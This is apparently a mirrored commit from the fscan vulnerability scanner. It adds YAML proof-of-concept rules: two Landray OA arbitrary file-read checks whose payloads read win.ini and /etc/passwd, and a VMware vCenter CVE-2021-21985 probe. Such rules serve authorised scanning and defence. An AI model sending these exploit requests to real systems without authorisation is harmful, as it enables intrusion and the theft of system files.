mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-25 12:41:53 +08:00
更新poc
This commit is contained in:
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-landray-oa-custom-jsp-fileread
|
||||
rules:
|
||||
- method: POST
|
||||
path: /sys/ui/extend/varkind/custom.jsp
|
||||
body: var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
@@ -0,0 +1,11 @@
|
||||
name: poc-yaml-landray-oa-custom-jsp-fileread
|
||||
rules:
|
||||
- method: POST
|
||||
path: /sys/ui/extend/varkind/custom.jsp
|
||||
body: var={"body":{"file":"file:///etc/passwd"}}
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
||||
@@ -0,0 +1,17 @@
|
||||
name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
|
||||
rules:
|
||||
- method: POST
|
||||
path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |-
|
||||
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"result")
|
||||
detail:
|
||||
vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
|
||||
author: envone77
|
||||
description: "vmware vCenter unauth RCE cve-2021-21985"
|
||||
links:
|
||||
- https://www.anquanke.com/post/id/243098
|
||||
- https://github.com/alt3kx/CVE-2021-21985_PoC
|
||||
Reference in New Issue
Block a user